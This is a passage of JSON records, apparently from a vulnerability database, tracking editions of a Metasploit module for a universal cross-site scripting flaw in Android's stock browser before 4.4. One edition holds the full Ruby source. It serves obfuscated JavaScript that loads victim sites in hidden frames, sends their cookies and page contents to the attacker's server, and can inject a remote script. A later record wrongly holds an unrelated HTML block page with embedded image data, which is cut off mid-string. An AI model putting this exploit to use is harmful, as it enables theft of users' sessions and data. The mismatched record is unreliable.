exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-05T19:41:49", "differentElements": ["sourceData"], "edition": 82}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "66526d54b1c2468cc1565418836e346e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-06T11:41:02", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-07-06T11:41:02"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310883077", "OPENVAS:1361412562310883078", "OPENVAS:1361412562310876555", "OPENVAS:1361412562310876554", "OPENVAS:1361412562310891843", "OPENVAS:1361412562310844077", "OPENVAS:1361412562310876552", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310852608"]}, {"type": "zdt", "idList": ["1337DAY-ID-32954", "1337DAY-ID-32952"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}], "modified": "2019-07-06T11:41:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-06T11:41:02", "differentElements": ["sourceData"], "edition": 83}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-06T13:36:19", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2019-07-06T13:36:19"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310883077", "OPENVAS:1361412562310876554", "OPENVAS:1361412562310883078", "OPENVAS:1361412562310876555", "OPENVAS:1361412562310891843", "OPENVAS:1361412562310844077", "OPENVAS:1361412562310876552", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310852609"]}, {"type": "zdt", "idList": ["1337DAY-ID-32954", "1337DAY-ID-32952"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}], "modified": "2019-07-06T13:36:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-06T13:36:19", "differentElements": ["sourceData"], "edition": 84}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "2d09754ccb929cab1bcefa40f9d1ecc9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-17T22:47:50", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2019-07-17T22:47:50"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:92972EAF9D82078A646C89FF655246FA"]}, {"type": "schneier", "idList": ["SCHNEIER:96A2F50F6F033D167626C5A4E1D165EB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704482", "OPENVAS:1361412562310891853", "OPENVAS:1361412562310704481", "OPENVAS:1361412562310704480", "OPENVAS:1361412562310704479", "OPENVAS:1361412562310815247", "OPENVAS:1361412562310891852", "OPENVAS:1361412562310891850", "OPENVAS:1361412562310704478", "OPENVAS:1361412562310891851"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153627"]}, {"type": "exploitdb", "idList": ["EDB-ID:47120"]}], "modified": "2019-07-17T22:47:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "<!DOCTYPE html>\n<html>\n\t<head>\n\t\t<meta charset=\"utf-8\">\n\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\t\t<title>Block page</title>\n\t\t<link rel=\"stylesheet\" type=\"text/css\" href=\"https://kliksafestoppagina.kliksafe.nl/2017ns/css/Font/Fonts.css\">\n\t\t<link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.8.2/css/all.css\" integrity=\"sha384-oS3vJWv+0UjzBfQzYUhtDYW+Pj2yciDJxpsK1OYPAYjqT085Qq/1cq5FLXAZQ7Ay\" crossorigin=\"anonymous\">\n\t\t<style>\n\t\t\thtml,body \t{\n\t\t\t\t\t\tbackground-color:#444;\n\t\t\t\t\t\tcolor:#FFF;\n\t\t\t\t\t\theight: 100%;\n\t\t\t\t\t\twidth: 100%;\n\t\t\t\t\t\tpadding: 0px;\n\t\t\t\t\t\tmargin: 0px;\n\t\t\t\t\t\tfont-size: 20px;\n\t\t\t\t\t\t}\n\t\t\t.header \t{\n\t\t\t\t\t\theight: 50%;\n\t\t\t\t\t\twidth: 100%;\n\t\t\t\t\t\tmargin: 0px;\n\t\t\t\t\t\tbackground: url('data:image/jpeg;base64,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